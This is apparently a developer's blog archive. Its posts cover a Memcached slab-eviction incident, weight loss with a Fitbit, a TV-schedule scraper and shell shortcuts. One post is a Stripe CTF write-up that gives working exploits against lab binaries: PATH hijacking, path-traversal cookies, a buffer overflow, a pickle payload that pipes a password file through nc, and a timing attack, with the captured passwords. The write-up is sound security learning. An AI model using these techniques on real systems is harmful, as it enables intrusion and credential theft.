February 03, 2014

Memcached Doesn't Work the Way You Think It Does

A coworker strolled over to my desk late on a Thursday afternoon and casually mentioned that one of our internal tools was unresponsive. On investigation I discovered that the box was getting hammered with requests: under normal circumstances this machine receives 1 request per minute (RPM), but it was currently receiving 1,200 RPM.


We started by looking at our caching code and the Memcached pool. There were no graphs or alerts that showed anything odd. Each Memcached instance was configured to use 4GB of memory, but only 1GB was in use according to Memcached's internal bytes statistic. The large number of requests pointed to an empty cache, yet nothing in the code indicated what could be causing it.
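That bytes statistic is exposed over Memcached's plain-text protocol, so you can pull it straight off a node. Here's a minimal Ruby sketch; the host and port are placeholders for your own pool.

require 'socket'

# Query a memcached node's stats over the text protocol.
# Responses are lines of "STAT <name> <value>" terminated by "END".
def memcached_stats(host, port)
  stats = {}
  TCPSocket.open(host, port) do |sock|
    sock.write("stats\r\n")
    while (line = sock.gets)
      break if line.start_with?('END')
      _stat, name, value = line.split
      stats[name] = value
    end
  end
  stats
end

stats = memcached_stats('localhost', 11211)  # placeholder host/port
used  = stats['bytes'].to_f
limit = stats['limit_maxbytes'].to_f
puts format("%.1f%% of memory in use", 100 * used / limit)

So we ran a few tests and found some troubling results.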


>> Rails.cache.write("phil_test_key", JSON.parse(result.http_response.body), :expires_in => 1.day)
=> true
>> 100.times do |i|
?>   break if Rails.cache.read("phil_test_key", :raw => true).nil?
>>   puts "#{i} seconds"
>>   sleep 1
>> end
0 seconds
1 seconds
...
12 seconds
13 seconds
=> nil


The object we were storing, after parsing the JSON and marshalling, was roughly 28K. When we decreased the size of the object to 25K the problem disappeared. When we increased the size to 33K the problem also disappeared. The quick and dirty solution, therefore, was to add 5K of junk data to the service response, which solved our problem for the moment. But this exposed a misunderstanding of how Memcached works behind the scenes, and a problem with how we were monitoring our caching infrastructure.


I knew our clients used hashed key names to determine which Memcached server to store a value in. But beyond that, Memcached was just a big non-persistent key-value store with expirations. Most of my coworkers and I treated Memcached like the following figure.


[ Figure 1: Memcached Naive Understanding ]
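The server-selection part is the piece most people do know. A simplified Ruby sketch of it might look like the following; the server list is hypothetical, and real clients (Dalli, for instance) use a consistent-hashing ring rather than a bare modulo so that adding or removing a node doesn't remap nearly every key.

require 'digest/md5'

SERVERS = %w[cache1:11211 cache2:11211 cache3:11211]  # hypothetical pool

# Hash the key and pick a server; every client maps a given key the same way.
def server_for(key)
  SERVERS[Digest::MD5.hexdigest(key).to_i(16) % SERVERS.size]
end

puts server_for('phil_test_key')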


How Memcached actually works is more complex than that, and once we understood the mechanics underneath, our problem quickly came into focus. There are three key components you need to understand in order to grasp the issue (a sketch after this list shows how the size classes fall out):
  • Pages: By default one page == 1MB of Memcached memory. Pages are available for allocation to slabs, but once a page has been allocated to a slab it can't be allocated to another slab later.
  • Slabs: Each page is assigned to a slab class. A slab class has a range of data sizes that it's responsible for storing. For example, a piece of data that's 28K in size would be stored within a slab that handles data sizes between 25K and 33K. (Exact sizes depend on configuration.)
  • Chunks: Each individual value is stored within a single chunk, and a slab is made up of these chunks. If 28K of data is stored in a chunk within the slab that handles data up to 33K in size, the remaining 5K is wasted.
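Those size classes aren't arbitrary: each class's chunk size is roughly the previous one times a growth factor. Here's a back-of-the-envelope Ruby sketch; the 96-byte base and the 1.25 factor match Memcached's defaults as I understand them, but both are configurable (-n and -f), so treat the exact boundaries as assumptions.

base   = 96           # assumed starting chunk size; configurable
factor = 1.25         # memcached's default growth factor; also configurable
max    = 1024 * 1024  # chunks are capped at the 1MB page size

classes = []
size = base
while size <= max
  classes << size
  size = (size * factor).ceil
end

item  = 28 * 1024  # our ~28K cached object
chunk = classes.find { |c| c >= item }
puts "a #{item}-byte item lands in the #{chunk}-byte class, wasting #{chunk - item} bytes"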
   
In the figure below we show a Memcached host configured to run with 8MB of memory, of which 2MB has already been allocated.


[ Figure 2: Memcached Host and Page Allocation ]


The figure below represents a single page which has been assigned to a slab. Within it are allocated chunks which each contain some data.


[ Figure 3: A Single Allocated Page with Allocated Chunks ]


The figure below represents a single chunk.


[ Figure 4: A Single Chunk of Data ]


In our case, all the pages in our Memcached instance had been allocated to slabs. And since pages are never reallocated, we effectively had a cache with plenty of free space for values of some sizes but not others, resulting in evictions. An expiration is expected and often a useful tool for keeping data fresh; an eviction is when data is removed from the store before it has expired, and it is not expected.


When our app tried to store a 28K object, Memcached found the least recently used object in that slab and removed it from the store. With sufficient traffic at a particular data size we started seeing rapid evictions. And because our data was repeatedly being evicted, the service responsible for generating it was getting slammed with requests and couldn't keep up with the heavier load.


While we had already mitigated our initial problem, this highlighted a much bigger issue: thousands of evictions per minute, resulting in constant cache misses and slower performance. We restarted the Memcached instances in this pool late at night, which allowed the pages to be reallocated. Here's a graph illustrating the drop in response time for a particular API call over time. As you can see, it was pretty substantial.


[ Figure 5: API Response Time ]


Long term we're looking at Twemcache, a fork of Memcached that allows more fine-grained eviction control, which should keep our page allocation in balance going forward. For now we're keeping a much closer eye on our eviction rate and alerting on anything over 0.
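The check itself can be as simple as reading the evictions counter off each node. A minimal sketch of that kind of check follows; the node list is hypothetical, and since evictions is a cumulative counter, a real check would compare against the previous sample to get a rate.

require 'socket'

NODES = %w[cache1:11211 cache2:11211]  # hypothetical pool members

failed = NODES.select do |node|
  host, port = node.split(':')
  evictions = 0
  TCPSocket.open(host, port.to_i) do |sock|
    sock.write("stats\r\n")
    while (line = sock.gets)
      break if line.start_with?('END')
      _stat, name, value = line.split
      evictions = value.to_i if name == 'evictions'
    end
  end
  evictions > 0
end

# A non-zero exit trips the alert.
abort("evictions detected on: #{failed.join(', ')}") unless failed.empty?
puts 'no evictions'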


Philip Corliss is a Cheese Enthusiast and wrote this blog post while a Software Developer at Groupon. He’s no longer working for Groupon but still loves to talk about caching and scaling problems. For cheese recommendations, adorable corgi photos, and questions please email pcorliss@gmail.com or tweet @pcorliss.


January 27, 2014

Fitbit Data and Weightloss

I was always a fat kid, later a fat teenager, and, no real surprise, a fat adult. I've always struggled with food, exercise, and my appearance. Food was a comfort: I used it to de-stress, and I ate when I was bored. Exercise was to be avoided because I sweat excessively. I've dieted before, and gone on short exercise stints, but nothing lasted more than a few months.


About a year ago I got a bit more serious and started a regular appointment with a personal trainer. She taught me how to lift weights and pace my workouts, and got me on a good enough track that I could exercise on my own. The foundation was there: I had lost 15 pounds from 240 lbs, and I had developed some core strength. I didn't keep it up, though.


In early May I pre-ordered the Fitbit Flex. Some friends of mine already had earlier versions, but I figured it might be worth it. I was worried, though; I have a long history of gadget-based exercise incentives: WiiFit, pull-up bars, Hundred Push Ups, etc.


After the Fitbit arrived, I strapped it on and really got into the distance-based goal approach. Movement around the office plus my walk to and from work usually netted me 4 miles, but I needed to do supplementary exercise to get that last mile. Because the daily goal was there, I started spending a lot more time in the gym. Once or twice a week suddenly jumped up to 5-6 days a week.


My weekly plan consisted of 2-3 days of weight-lifting with a 10-minute warmup on the treadmill, then rest days where I would do intervals or treadmill hill climbs. I went from only being able to run a 10-minute mile to a 7:20 mile. I started running longer distances on the treadmill, at first 2 miles, then 3, then 5, and in the last three months I've been running 6-10 miles outdoors.


I cut out soda, except for a treat every 2-4 weeks, and tried to snack less. At first this worked wonders, but around November I had to start cutting calories to see the same weight loss I was seeing in previous months.


There have been a couple of setbacks along the way: I had nagging left-knee pain throughout November and December, and for the last few weeks I've been using the stationary bike exclusively to try to reduce the impact and let my knee recover. I've also noticed a constantly shifting array of muscle aches and pains induced by weight-lifting.


On the positive side, I'm in the best shape of my life. This morning I weighed in at 196 lbs. I've been below 200 lbs, my goal weight, for over a week now. This is down from 226 lbs at the end of May.


[ Figure: Weight over time, processed via the Fitbit API and a quick script I put together. ]


The effects are noticeable: I look better in the mirror, fat has given way to muscle, and the excessive sweating seems to have eased off. I've lost about 4 inches around my waistline. I've given up x-large t-shirts in favor of large t-shirts. I'll need to pick up some more pants at the very least, as they're starting to look comical on me.


I plan to lose about 5-10 more pounds, then take a break for a while and go on a maintenance plan. Afterwards I may start weightlifting more seriously in an effort to add more lean muscle. My scale claims I've only lost about 2-3 lbs of lean muscle during this period, but I'm not sure I trust the accuracy of the bioelectrical impedance testing on a $20 scale.

January 20, 2014

Law & Order

About two years ago I was on an exchange program with another team at Groupon. I flew out to Palo Alto, checked in to my hotel, and spent two weeks working with another team. It was an interesting experience: I learned a lot, committed some code, and made a big impact. At the end I came back to Chicago more knowledgeable about Groupon's core systems.

There was a lot of down-time during those two weeks, and I ended up watching a lot of cable TV. What I found was that, for me, the most comforting show on television was Law & Order. At almost any time of day or night I could find a channel playing one of the many varieties of the show. For whatever reason, knowing it was a near-constant helped me relax and decompress a bit. The only problem was finding the right channel.

Thus was born WhatTimeIsLawAndOrderOn.com. I started off by scraping a site which I won't name, for obvious reasons. I then loaded the pages into Nokogiri and developed a series of rules for parsing the data. After an evening I had something mostly working. After another day I had a domain, a basic design, and an S3 bucket with mirrors of the content.
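The parsing step is nothing exotic. Here's a sketch of the shape of it; the URL and the CSS selectors are hypothetical stand-ins, since the real source site and its markup aren't named.

require 'open-uri'
require 'nokogiri'

# Fetch a schedule page and pull each listing row apart.
doc = Nokogiri::HTML(URI.open('http://example.com/tv-schedule'))  # placeholder URL

listings = doc.css('table.schedule tr').map do |row|
  cells = row.css('td').map { |td| td.text.strip }
  { time: cells[0], channel: cells[1], show: cells[2] }
end

law_and_order = listings.select { |l| l[:show].to_s =~ /law & order/i }
puts law_and_order.first(5)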

I had planned to run a regular rake task to keep the data updated but never got around to it. Now, with "Funemployment" in full swing, I figured it was time to dust it off and make it properly functional. With some modifications to the encoding and feed parsing, which took most of the day, it's now running on Heroku, and if the scheduled job runs as expected it should stay up to date.

Another nifty feature is that by scraping the entire TV schedule I can spin off dozens of other domains for many different shows. If the traffic is high enough I might just be able to cover the costs of buying more domains and hosting with some basic ads.

A bit of a silly thing to get started with for my first full week of Funemployment, but cleaning up some of my old projects seemed like a nice way to spend some time.

February 28, 2012

Stripe CTF

Code is available at https://github.com/pcorliss/Stripe-CTF

My solutions to the Stripe CTF challenge are as follows.

Note that in many cases the code isn't very robust or workable, but it was the minimum needed to complete the level.

Level 01

On observing that the system call within level01.c made an unchecked call to 'date' without a full path specified, I created a local date file and prepended its directory to my PATH. That file was a simple shell script containing 'cat /home/level02/.password'.

level01@ctf:/tmp/tmp.8N0qqvoaVu$ export PATH=/tmp/tmp.8N0qqvoaVu:$PATH
level01@ctf:/tmp/tmp.8N0qqvoaVu$ chmod a+x date
level01@ctf:/tmp/tmp.8N0qqvoaVu$ /levels/level01
Current time: kxlVXUvzv

Level 02

Level 2 uses the contents of the client's cookie to read a file without escaping the contents. Via a browser I modified the cookie set by the level to the following, and the password was printed as part of the web page.

Change cookie to ../../home/level03/.password
Or0m4UX07b

Level 03

I had never performed any sort of pointer arithmetic outside of an introductory CS course, so this was certainly a challenge for me. Outside of level 6, I think I spent more time on this level than any of the other ones.

On reading level 3's source code I noticed that it was executing the function via an array of function pointers. However, the selection mechanism only rejected index arguments >= 3; it never checked for numbers < 0.

After spending more time with it and gdb, I realized you could also supply a negative number that pointed to a specific location in the string buffer you pass as an argument. After some fiddling I provided the memory address of the deprecated run function.

level03@ctf4:/tmp/tmp.uuCAtV5Uog$ /levels/level03 -21 'cat /home/level04/.password;'$'\x5b'$'\x87'$'\x04'$'\x08'
i5cBbPvPCpcP
sh: [: not found

Level 04

Like level 03, I had never performed a buffer overflow before. I did some searching and came across a guide that amounts to buffer overflows for dummies. With some tweaking I was able to make it work against the level 4 binary. It works about 50% of the time; from what I understand, Linux uses some form of stack randomization (ASLR) to prevent this sort of attack. From reading other reports online there is a way to get a deterministic solution, but I didn't take the time to explore that.

Offset: -994
Address: 0xffa368fe
Executing
Buffer:57200
Buffer:0
$
$ whoami
level05
$ cat /home/level05/.password
fzfDGnSmd317

Level 05

After looking at the Python web server and running it locally, I noticed that it wasn't properly escaping user input and allowed a file containing executable code to be written. I pickled up a simple exploit, started a netcat server listening, and passed it through.

level05@ctf4:/tmp/tmp.7mKxYf6M1c$ nc -l 9333 &
[1] 24599
level05@ctf4:/tmp/tmp.7mKxYf6M1c$
level05@ctf4:/tmp/tmp.7mKxYf6M1c$ curl localhost:9020 -d "DATA; job: cos
system
(S'nc localhost 9333 < /home/level06/.password'
tR.'
tR.
"
SF2w8qU1QDj
{
"result": "Job timed out"
}
[1]+ Done nc -l 9333

Level 06

Of all the challenges, this one took the most time. I had heard of timing attacks and felt I understood how they're implemented, but I had no idea how hard one would be to actually pull off.

First I tried something written in Ruby that timed how long the command took to run; however, I saw very little difference in how fast something failed. Given that I was initially testing for the difference between one variable check and two, a difference smaller than even the nanosecond precision of the Ruby clock, this failed right away.

Then I tried an implementation that already existed online, simply to see if it would work, given that many of the servers were under heavy load and actively running out of forks. But even that supposed solution failed for me, as it seems to depend on the binary forking and reporting failure almost immediately, which I wasn't able to replicate even locally.

Finally I settled on passing very large arguments to slow down the evaluation, similar to the solution above, and then timed each character read, in microseconds, via a small C program. The fork operation takes slightly longer than a normal character check, so with microsecond precision you can determine where the failure occurred.
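To give a feel for the approach, here is a skeletal Ruby version of the guessing loop. It is not the actual ruby_wrapper.rb: this cruder variant times whole runs of the checker rather than individual output characters, the junk-suffix length and trial counts are made up, and the 24-character password length is taken from the transcript below.

require 'open3'

LEVEL   = '/levels/level06'
TARGET  = '/home/the-flag/.password'
JUNK    = 'A' * 40_000  # large suffix slows every comparison down
CHARSET = [*'a'..'z', *'A'..'Z', *'0'..'9']

# Time one full run of the checker in microseconds.
def time_once(guess)
  t0 = Process.clock_gettime(Process::CLOCK_MONOTONIC, :microsecond)
  Open3.capture2e(LEVEL, TARGET, guess + JUNK)
  Process.clock_gettime(Process::CLOCK_MONOTONIC, :microsecond) - t0
end

answer = ''
24.times do
  # A correct prefix survives one more comparison (and one more fork)
  # before failing, so the right candidate takes measurably longer.
  votes = Hash.new(0)
  5.times { votes[CHARSET.max_by { |c| time_once(answer + c) }] += 1 }
  answer << votes.max_by { |_, n| n }.first
  puts "Answer: #{answer}"
end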

This solution worked perfectly for me locally, but I had to tune it on Stripe's servers in order to get it to work. I'm not sure if I was reading the buffer incorrectly, if the machine was overloaded, or if my code just runs in a way I'm not expecting. Either way, with some fine tuning and extra sanity checks I was able to get it to run against the password file and produce the answer.

level06@ctf5:/tmp/tmp.2eCZvV2CuJ$ ruby ruby_wrapper.rb
Suffix: 130772
{"t"=>4}
Answer: t
{"h"=>5}
Answer: th
{"e"=>5}
Answer: the
{"f"=>4}
Answer: thef
{"l"=>5}
Answer: thefl
{"a"=>5}
Answer: thefla
{"g"=>5}
Answer: theflag
{"l"=>5}
Answer: theflagl
{"0"=>4}
Answer: theflagl0
{"e"=>4}
Answer: theflagl0e
{"F"=>4}
Answer: theflagl0eF
{"T"=>5}
Answer: theflagl0eFT
{"t"=>5}
Answer: theflagl0eFTt
{"I"=>1, "T"=>5}
Answer: theflagl0eFTtT
{"5"=>5}
Answer: theflagl0eFTtT5
{"o"=>5}
Answer: theflagl0eFTtT5o
{"i"=>5}
Answer: theflagl0eFTtT5oi
{"0"=>4}
Answer: theflagl0eFTtT5oi0
{"n"=>5, "r"=>1}
Answer: theflagl0eFTtT5oi0n
{"O"=>5}
Answer: theflagl0eFTtT5oi0nO
{"T"=>5}
Answer: theflagl0eFTtT5oi0nOT
{"x"=>5, "e"=>1}
Answer: theflagl0eFTtT5oi0nOTx
{"O"=>5}
Answer: theflagl0eFTtT5oi0nOTxO
{"5"=>5}
Answer: theflagl0eFTtT5oi0nOTxO5
{}
Answer: theflagl0eFTtT5oi0nOTxO5

level06@ctf5:/tmp/tmp.2eCZvV2CuJ$ /levels/level06 /home/the-flag/.password theflagl0eFTtT5oi0nOTxO5
Welcome to the password checker!
........................
Wait, how did you know that the password was theflagl0eFTtT5oi0nOTxO5?

The Flag

You're able to log in as the flag user, but I couldn't find anything special or a secret next level. Perhaps I didn't look hard enough?

the-flag@ctf5:/tmp/tmp.qCU4Sz2RhR$

August 30, 2011

Lightning Talk - Geekfest

As part of Geekfest, a weekly Chicago-area meetup, I gave a 5-minute lightning talk on some basic command line shortcuts. My outline and the commands are below.

#Introduction
#I'm Philip Corliss, a Software Developer here at Groupon. While pairing, when my partner is using the keyboard, I'll often throw out requests for them to tab-complete, pipe to grep, or hit ESC-. They usually look at me like I'm crazy. This talk is designed to quickly outline a common scenario: parsing a log file or some other formatted file.

#What's this file
ls

#Whoah, watch this. If you're not familiar with tab completion you should be; it will make your life ridiculously easy. I for one can only spell the first three letters of most words at this point
less post....

#Let's take a look. Binary, huh? Weird
less postal_codes.csv.gz

#Oh yea, it's a gzip file, meaning it's compressed. We could decompress it, but let's pretend this compressed file is 1GB; at a 1:10 compression ratio that's 10GB of data, and we don't want to wait for that. So let's just look at it inline. Way faster
gzip ...

#Decompresses directly to STDOUT, great for working with the file
gzip -dc postal_codes.csv.gz

#Whoa, too much data, that doesn't really help us
^C

#What's that? It's a pipe; it pipes stdout from one program to another
gzip -dc postal_codes.csv.gz |

#First 15 lines, then it exits; no extra resources or IO consumed, and we get a quick sample of the data
gzip -dc postal_codes.csv.gz | head -15

#Let's cut this up (alternative awk syntax for multi-char delimiters: awk -F'|' '{ print $3 ":" $4 }')
gzip -dc postal_codes.csv.gz | head -15 | cut -d'|' -f3,4

#Let's sort it, get the unique values with counts, and then sort the results numerically
gzip -dc postal_codes.csv.gz | head -15 | cut -d'|' -f3,4 | sort | uniq -c | sort -n

#Top city/province pairs for Canadian postal codes, still from our 15-line sample; the full run takes some time, so next we'll cache it to a file
gzip -dc postal_codes.csv.gz | head -15 | cut -d'|' -f3,4 | sort | uniq -c | sort -n | tail -30

#Let's see how long it takes, and let's write the full report to a file
time gzip -dc postal_codes.csv.gz | cut -d'|' -f3,4 | sort | uniq -c | sort -n > ~/my_sweet_report.txt

#Use ESC-. to bring up last arg
less ~/my_sweet_report.txt 

May 30, 2011

Route53 Updated

I've just updated the route53 gem to support Amazon's latest additions, including weighted resource record sets as well as zone apex support, which allows assignment of ELB instances to the roots of domains. It effectively allows a CNAME from the naked domain to an ELB instance, which was previously unavailable to folks using EC2.

This is probably the most successful tool I've put together to date, with 75 watchers and 10 forks on GitHub as well as over 2,000 downloads and counting on RubyGems. I look forward to continuing to improve the project and keeping up with new features as Amazon releases them.

https://github.com/pcorliss/ruby_route_53

May 28, 2011

Quick Update

It's been a while since I last posted. I decided that talking about a job search while it was in progress was probably a bad move. After I finally got hired, I found it more and more difficult to come home at night after a long commute and spend time working on my own projects. But after a recent move that significantly reduced my commute, I'm ready to jump back in.

For those interested, I started working as a Software Developer at Groupon in late January and I've been doing well. I turned down some great offers and interviews, but in the end Groupon seemed to offer the biggest challenge. And in the "lawyers made me say it" category: while I do work for Groupon, my opinions are my own, as is the code that I develop outside of the office.

Expect a new post about some upgrades to the route53 gem to support some newly released features, as well as an RSpec patch I put together to support running multiple specs via line ranges.